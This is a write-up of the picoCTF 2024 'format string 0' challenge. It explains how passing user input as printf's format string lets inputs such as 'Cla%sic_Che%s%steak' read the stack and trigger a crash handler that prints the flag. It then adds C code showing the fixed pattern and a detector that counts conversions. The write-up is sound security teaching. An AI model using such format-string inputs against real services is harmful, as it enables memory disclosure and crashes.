Level: Easy
Tags: picoCTF 2024, Binary Exploitation, format_string, browser_webshell_solvable
Author: CHENG ZHANG
Description:
Can you use your knowledge of format strings to make the customers happy?
Download the binary here.
Download the source here.
Connect with the challenge instance here:
nc mimas.picoctf.net 58598
Hints:
1. This is an introduction of format string vulnerabilities. Look up "format specifiers"
if you have never seen them before.
2. Just try out the different options
Challenge link: https://play.picoctf.org/practice/challenge/433
We start by analysing the rather long C source code, beginning with the main function.
int main(int argc, char **argv){
    /* flag and FLAGSIZE are declared elsewhere in the source */
    FILE *f = fopen("flag.txt", "r");
    if (f == NULL) {
        printf("%s %s", "Please create 'flag.txt' in this directory with your",
                        "own debugging flag.\n");
        exit(0);
    }
    fgets(flag, FLAGSIZE, f);
    signal(SIGSEGV, sigsegv_handler);
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    serve_patrick();
    return 0;
}
Main basically does the following:
- Makes sure there is a flag.txt file available
- Sets up a signal handler for SIGSEGV (invalid memory references)
- Sets permissions (user and group IDs) with setresgid
- Calls the serve_patrick function
If an invalid memory reference happens, the sigsegv_handler function is called
void sigsegv_handler(int sig) {
    printf("\n%s\n", flag);
    fflush(stdout);
    exit(1);
}
and will display the flag for us.
Let's skip the rest of the source code for now and try out the binary.
Next, we run the binary
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$ ./format-string-0
Please create 'flag.txt' in this directory with your own debugging flag.
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$ echo "picoCTF{fake_flag}" > flag.txt
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$ ./format-string-0
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Gr%114d_Cheese
Gr 4202954_Cheese
Good job! Patrick is happy! Now can you serve the second customer?
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation: Cla%sic_Che%s%steak
picoCTF{fake_flag}
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$
Of the choices I chose Gr%114d_Cheese and Cla%sic_Che%s%steak because both contain format specifiers. Since no matching arguments are passed to printf, each specifier makes it read whatever happens to be on the stack; the %s conversions in the second choice dereference those values as pointers, which causes an invalid memory reference and triggers the SIGSEGV handler.
The vulnerabilities are the printf calls that pass the user-controlled string directly as the format argument instead of using a fixed format such as "%s", i.e.
- The line int count = printf(choice1); in the serve_patrick function, and
- The line printf(choice2); in the serve_bob function
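As an added example (not part of the challenge source), the vulnerable pattern is shown in a comment beside its fixed form, together with a small scanner that counts how many arguments printf would try to consume from an untrusted string. The function names and the menu strings used in main are my own constructed sample input.

```c
/* Added example, not from the picoCTF challenge source. */
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (what the challenge does): the user's string IS the
 * format string, so every '%' in it makes printf fetch an argument that was
 * never passed. Kept as a comment so the file compiles warning-free:
 *
 *     static void print_choice_vulnerable(const char *choice) {
 *         printf(choice);
 *     }
 */

/* Fixed pattern: the format is a constant and the input is plain data.
 * Returns the number of characters written, like printf. */
int print_choice_fixed(const char *choice) {
    return printf("%s\n", choice);
}

/* Render into a caller-supplied buffer with a constant format.
 * Returns the length of the rendered string, like snprintf. */
int render_choice_safe(char *out, size_t outsz, const char *choice) {
    return snprintf(out, outsz, "%s", choice);
}

/* Count conversion specifiers the way printf would interpret them:
 * "%%" is a literal percent sign, any other '%' starts a conversion.
 * The result is the number of arguments printf(s) would consume, which
 * makes it a cheap detection check for untrusted strings that are about
 * to reach a format function. */
int count_conversions(const char *s) {
    int n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" is an escaped percent sign */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void) {
    /* Constructed sample input: the burger names from the challenge menu. */
    const char *menu[] = {
        "Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe",
        "Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak",
    };
    char buf[64];
    for (size_t i = 0; i < sizeof menu / sizeof menu[0]; i++) {
        int conv = count_conversions(menu[i]);
        render_choice_safe(buf, sizeof buf, menu[i]);
        /* The rendered text is identical to the input: no stack reads,
         * no pointer dereferences, regardless of how many '%' it holds. */
        printf("%-22s conversions=%d rendered=%s\n", menu[i], conv, buf);
    }
    return 0;
}
```

Running the block prints each menu item with its conversion count and the text exactly as entered; the two strings used in the writeup report 1 and 3 conversions respectively, which is how many stack slots the challenge's printf(choice) would read for them.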
Finally, we connect to the site with netcat and give the same answers to get the real flag
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$ nc mimas.picoctf.net 58598
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Gr%114d_Cheese
Gr 4202954_Cheese
Good job! Patrick is happy! Now can you serve the second customer?
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation: Cla%sic_Che%s%steak
ClaCla%sic_Che%s%steakic_Che(null)
picoCTF{<REDACTED>}
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Binary_Exploitation/format_string_0]
└─$
For additional information, please see the references below.